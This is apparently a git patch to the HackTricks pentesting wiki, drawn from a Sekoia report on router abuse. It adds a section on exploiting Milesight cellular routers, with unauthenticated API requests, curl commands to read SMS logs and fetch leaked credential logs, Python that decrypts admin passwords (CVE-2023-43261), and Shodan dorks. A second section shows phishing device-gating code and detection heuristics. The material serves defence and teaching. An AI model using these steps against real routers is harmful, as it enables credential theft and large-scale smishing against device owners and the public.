From c8a99a2b3569dac2d15d13f74807bfe18f414674 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Wed, 1 Oct 2025 13:14:00 +0000 Subject: [PATCH] Add content from: Silent Smishing: The Hidden Abuse of Cellular Router APIs --- .../telecom-network-exploitation.md | 72 ++++++++++++++++++- .../phishing-methodology/README.md | 32 +++++++++ src/welcome/hacktricks-values-and-faq.md | 3 +- 3 files changed, 104 insertions(+), 3 deletions(-) diff --git a/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md b/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md index a7f92693c..2619fa600 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md +++ b/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md @@ -247,6 +247,73 @@ Mitigations: - Alert on NAS security modes that result in null algorithms or frequent replays of InitialUEMessage. --- + +## 10. Industrial Cellular Routers – Unauthenticated SMS API Abuse (Milesight UR5X/UR32/UR35/UR41) and Credential Recovery (CVE-2023-43261) + +Abusing exposed web APIs of industrial cellular routers enables stealthy, carrier-origin smishing at scale. Milesight UR-series routers expose a JSON-RPC–style endpoint at `/cgi`. When misconfigured, the API can be queried without authentication to list SMS inbox/outbox and, in some deployments, to send SMS. + +Typical unauthenticated requests (same structure for inbox/outbox): + +```http +POST /cgi HTTP/1.1 +Host: +Content-Type: application/json + +{ "base": "query_outbox", "function": "query_outbox", "values": [ {"page":1,"per_page":50} ] } +``` + +```json +{ "base": "query_inbox", "function": "query_inbox", "values": [ {"page":1,"per_page":50} ] } +``` + +Responses include fields such as `timestamp`, `content`, `phone_number` (E.164), and `status` (`success` or `failed`). Repeated `failed` sends to the same number are often attacker “capability checks” to validate that a router/SIM can deliver before blasting. + +Example curl to exfiltrate SMS metadata: + +```bash +curl -sk -X POST http:///cgi \ + -H 'Content-Type: application/json' \ + -d '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}' +``` + +Notes on auth artifacts: +- Some traffic may include an auth cookie, but a large fraction of exposed devices respond without any authentication to `query_inbox`/`query_outbox` when the management interface is Internet-facing. +- In environments requiring auth, previously-leaked credentials (see below) restore access. + +Credential recovery path – CVE-2023-43261: +- Affected families: UR5X, UR32L, UR32, UR35, UR41 (pre v35.3.0.7). +- Issue: web-served logs (e.g., `httpd.log`) are reachable unauthenticated under `/lang/log/` and contain admin login events with the password encrypted using a hardcoded AES key/IV present in client-side JavaScript. +- Practical access and decrypt: + +```bash +curl -sk http:///lang/log/httpd.log | sed -n '1,200p' +# Look for entries like: {"username":"admin","password":""} +``` + +Minimal Python to decrypt leaked passwords (AES-128-CBC, hardcoded key/IV): + +```python +import base64 +from Crypto.Cipher import AES +from Crypto.Util.Padding import unpad +KEY=b'1111111111111111'; IV=b'2222222222222222' +enc_b64='...' # value from httpd.log +print(unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(enc_b64)), AES.block_size).decode()) +``` + +Hunting and detection ideas (network): +- Alert on unauthenticated `POST /cgi` whose JSON body contains `base`/`function` set to `query_inbox` or `query_outbox`. +- Track repeated `POST /cgi` bursts followed by `status":"failed"` entries across many unique numbers from the same source IP (capability testing). +- Inventory Internet-exposed Milesight routers; restrict management to VPN; disable SMS features unless required; upgrade to ≥ v35.3.0.7; rotate credentials and review SMS logs for unknown sends. + +Shodan/OSINT pivots (examples seen in the wild): +- `http.html:"rt_title"` matches Milesight router panels. +- Google dorking for exposed logs: `"/lang/log/system" ext:log`. + +Operational impact: using legitimate carrier SIMs inside routers gives very high SMS deliverability/credibility for phishing, while inbox/outbox exposure leaks sensitive metadata at scale. + +--- + ## Detection Ideas 1. **Any device other than an SGSN/GGSN establishing Create PDP Context Requests**. 2. **Non-standard ports (53, 80, 443) receiving SSH handshakes** from internal IPs. @@ -263,5 +330,8 @@ Mitigations: - [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol) - 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS - 3GPP TS 33.501 – Security architecture and procedures for 5G System +- [Silent Smishing: The Hidden Abuse of Cellular Router APIs (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/) +- [CVE-2023-43261 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-43261) +- [CVE-2023-43261 PoC (win3zz)](https://github.com/win3zz/CVE-2023-43261) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/phishing-methodology/README.md b/src/generic-methodologies-and-resources/phishing-methodology/README.md index b00858a5d..8ac7ef51e 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/README.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/README.md @@ -579,6 +579,37 @@ clipboard-hijacking.md mobile-phishing-malicious-apps.md {{#endref}} +### Mobile‑gated phishing to evade crawlers/sandboxes +Operators increasingly gate their phishing flows behind a simple device check so desktop crawlers never reach the final pages. A common pattern is a small script that tests for a touch-capable DOM and posts the result to a server endpoint; non‑mobile clients receive HTTP 500 (or a blank page), while mobile users are served the full flow. + +Minimal client snippet (typical logic): + +```html + +``` + +`detect_device.js` logic (simplified): + +```javascript +const isMobile = ('ontouchstart' in document.documentElement); +fetch('/detect', {method:'POST', headers:{'Content-Type':'application/json'}, body: JSON.stringify({is_mobile:isMobile})}) + .then(()=>location.reload()); +``` + +Server behaviour often observed: +- Sets a session cookie during the first load. +- Accepts `POST /detect {"is_mobile":true|false}`. +- Returns 500 (or placeholder) to subsequent GETs when `is_mobile=false`; serves phishing only if `true`. + +Hunting and detection heuristics: +- urlscan query: `filename:"detect_device.js" AND page.status:500` +- Web telemetry: sequence of `GET /static/detect_device.js` → `POST /detect` → HTTP 500 for non‑mobile; legitimate mobile victim paths return 200 with follow‑on HTML/JS. +- Block or scrutinize pages that condition content exclusively on `ontouchstart` or similar device checks. + +Defence tips: +- Execute crawlers with mobile‑like fingerprints and JS enabled to reveal gated content. +- Alert on suspicious 500 responses following `POST /detect` on newly registered domains. + ## References - [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/) @@ -586,6 +617,7 @@ mobile-phishing-malicious-apps.md - [https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/](https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/) - [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy) - [2025 Unit 42 Global Incident Response Report – Social Engineering Edition](https://unit42.paloaltonetworks.com/2025-unit-42-global-incident-response-report-social-engineering-edition/) +- [Silent Smishing – mobile-gated phishing infra and heuristics (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md index a5b53905c..dd6a54063 100644 --- a/src/welcome/hacktricks-values-and-faq.md +++ b/src/welcome/hacktricks-values-and-faq.md @@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con > [!TIP] > -> - **How can I cite a page of HackTricks?** +> - **How can I a page of HackTricks?** As long as the link **of** the page(s) where you took the information from appears it's enough.\ If you need a bibtex you can use something like: @@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the {{#include ../banners/hacktricks-training.md}} -